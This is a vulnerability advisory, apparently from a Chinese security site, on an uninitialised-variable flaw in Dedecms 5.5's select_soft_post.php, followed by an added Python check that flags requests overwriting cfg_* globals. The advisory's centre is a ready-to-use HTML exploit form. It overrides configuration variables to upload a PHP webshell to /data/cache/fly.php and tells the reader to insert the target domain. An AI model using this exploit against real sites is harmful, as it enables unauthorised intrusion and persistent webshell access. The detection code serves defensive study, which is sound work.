Dedecms select_soft_post.php uninitialized variable vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200925117
Type myhack58
Reporter Anonymous
Modified 2009-10-25T00:00:00


Author: Flyh4t

Affected versions: Dedecms 5.5

The vulnerable file is include\dialog\select_soft_post.php. The variable $cfg_basedir is not initialized properly, which makes it possible to bypass the identity authentication and system variable initialization files, so that any file can be uploaded to a specified directory. Exploitation requires register_globals=on, which lets a custom form assign values to the relevant variables. The code is as follows:

<body xxxxx="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action= method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='determine' />
</form>
<br />
It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Please modify the website domain name in the form accordingly.
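
A detection check for the condition described above, as an added example that is not part of the original advisory or of Dedecms: it parses a request's query string and form body and reports parameter names that would overwrite a cfg_* global when register_globals=on. The function names, the URL path form and the sample request are constructed assumptions.

```python
import email
from urllib.parse import parse_qsl, urlsplit

def param_names(url, content_type="", body=b""):
    """Every parameter name the request supplies via query string or body."""
    names = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    ctype = content_type.lower()
    if ctype.startswith("multipart/form-data"):
        # Reuse the stdlib MIME parser: prepend the header so it knows the boundary.
        msg = email.message_from_bytes(
            b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
        for part in (msg.get_payload() if msg.is_multipart() else []):
            name = part.get_param("name", header="content-disposition")
            if name:
                names.append(name)
    elif ctype.startswith("application/x-www-form-urlencoded"):
        names += [k for k, _ in
                  parse_qsl(body.decode("latin-1"), keep_blank_values=True)]
    return names

def php_global_name(name):
    """Variable name PHP derives from a parameter name:
    the array suffix is dropped, '.' and ' ' become '_'."""
    return name.split("[", 1)[0].replace(".", "_").replace(" ", "_")

def config_overrides(url, content_type="", body=b""):
    """Parameter names that would overwrite a cfg_* global (register_globals=on)."""
    # Assumption: cfg_* names are server-side configuration, never valid input.
    return [n for n in param_names(url, content_type, body)
            if php_global_name(n).startswith("cfg_")]

# Constructed sample request with placeholder values (not captured traffic).
SAMPLE_URL = "/include/dialog/select_soft_post.php?job=upload"
SAMPLE_CTYPE = "multipart/form-data; boundary=XB"
SAMPLE_BODY = (
    b'--XB\r\nContent-Disposition: form-data; name="activepath"\r\n\r\nx\r\n'
    b'--XB\r\nContent-Disposition: form-data; name="cfg_basedir"\r\n\r\nx\r\n'
    b'--XB\r\nContent-Disposition: form-data; name="cfg.softtype"\r\n\r\nx\r\n'
    b'--XB\r\nContent-Disposition: form-data; name="uploadfile";'
    b' filename="a.txt"\r\nContent-Type: text/plain\r\n\r\nconstructed\r\n'
    b'--XB--\r\n'
)

if __name__ == "__main__":
    print(config_overrides(SAMPLE_URL, SAMPLE_CTYPE, SAMPLE_BODY))
```

The `cfg.softtype` field in the sample is flagged because PHP converts dots and spaces in incoming parameter names to underscores, so a filter that matches only the literal `cfg_` prefix would miss it.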